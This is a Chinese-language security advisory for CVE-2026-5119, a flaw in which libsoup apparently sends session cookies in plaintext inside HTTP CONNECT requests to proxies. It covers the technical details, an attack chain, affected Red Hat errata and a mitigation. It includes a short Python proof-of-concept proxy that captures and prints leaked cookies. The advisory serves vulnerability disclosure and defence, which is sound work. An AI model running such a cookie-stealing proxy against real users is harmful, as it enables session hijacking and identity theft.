CVE-2026-5119 libsoup敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-5119

漏洞类型

敏感信息泄露

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

libsoup

漏洞概述

libsoup组件在通过HTTP代理建立HTTPS隧道时存在安全缺陷。当客户端发起连接时，敏感的会话Cookie被错误地包含在初始HTTP CONNECT请求中并以明文传输。位于网络中的攻击者或恶意代理服务器可截获这些Cookie，从而导致会话劫持或用户身份被冒充的风险。

技术细节

该漏洞产生于libsoup处理HTTP CONNECT请求时的逻辑错误。当应用通过HTTP代理访问HTTPS资源时，libsoup需要在建立TLS隧道前向代理发送CONNECT请求。在此过程中，libsoup未能正确区分上下文，将本应加密传输的敏感会话Cookie错误地包含在CONNECT请求的头部中。由于CONNECT阶段发生在TLS握手之前，这些头部数据必然以明文形式在网络中传输。任何能够监听网络流量或控制代理服务器的攻击者都可以轻易读取并提取这些Cookie。攻击者利用截获的Cookie可以重放会话，从而绕过身份验证机制，直接获取用户的登录状态与权限。这种攻击方式隐蔽且不需要破解TLS加密，对用户隐私和数据安全构成严重威胁。

攻击链分析

STEP 1

1

攻击者诱导用户配置使用HTTP代理，或攻击者已处于网络中间人位置。

STEP 2

2

用户使用受影响libsoup库的应用程序尝试访问HTTPS网站。

STEP 3

3

应用程序发送HTTP CONNECT请求到代理以建立隧道。

STEP 4

4

存在漏洞的libsoup在CONNECT请求头中明文包含敏感Cookie。

STEP 5

5

攻击者拦截CONNECT请求并提取Cookie。

STEP 6

6

攻击者使用窃取的Cookie劫持用户会话。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC: Malicious Proxy Server to Capture Cookies from CONNECT
import http.server
import socketserver

class CookieStealingProxy(http.server.BaseHTTPRequestHandler):
    def do_CONNECT(self):
        hostname = self.path.split(':')[0]
        print(f"[+] Intercepting CONNECT to: {hostname}")
        
        # Extract the Cookie header from the CONNECT request
        cookies = self.headers.get('Cookie')
        if cookies:
            print(f"[!] VULNERABILITY CONFIRMED: Leaked Cookie: {cookies}")
            # Save to file or send to attacker server here
        else:
            print("[-] No cookies found.")

        # Send 200 OK to allow connection (or block it)
        self.send_response(200, 'Connection Established')
        self.end_headers()
        # Simple tunnel logic would go here

if __name__ == "__main__":
    PORT = 8888
    with socketserver.TCPServer(("", PORT), CookieStealingProxy) as httpd:
        print(f"Listening for vulnerable clients on port {PORT}...")
        httpd.serve_forever()

影响范围

libsoup (Specific versions affected, see RHSA-2026:13978)

Red Hat Enterprise Linux (affected components per RHSA-2026:14087, RHSA-2026:15968, etc.)

防御指南

临时缓解措施

如果无法立即修补，建议在处理敏感会话时禁用HTTP代理，或确保网络链路完全可信以防止流量嗅探。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5119
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5119
3 Details https://www.cvedetails.com/cve/CVE-2026-5119/
4 VulDB https://vuldb.com/cve/CVE-2026-5119
5 Link https://access.redhat.com/errata/RHSA-2026:13978
6 Link https://access.redhat.com/errata/RHSA-2026:14087
7 Link https://access.redhat.com/errata/RHSA-2026:15968
8 Link https://access.redhat.com/errata/RHSA-2026:17482
9 Link https://access.redhat.com/errata/RHSA-2026:19143
10 Link https://access.redhat.com/errata/RHSA-2026:19356
11 Link https://access.redhat.com/security/cve/CVE-2026-5119
12 Link https://bugzilla.redhat.com/show_bug.cgi?id=2452932
13 Link https://gitlab.gnome.org/GNOME/libsoup/-/issues/502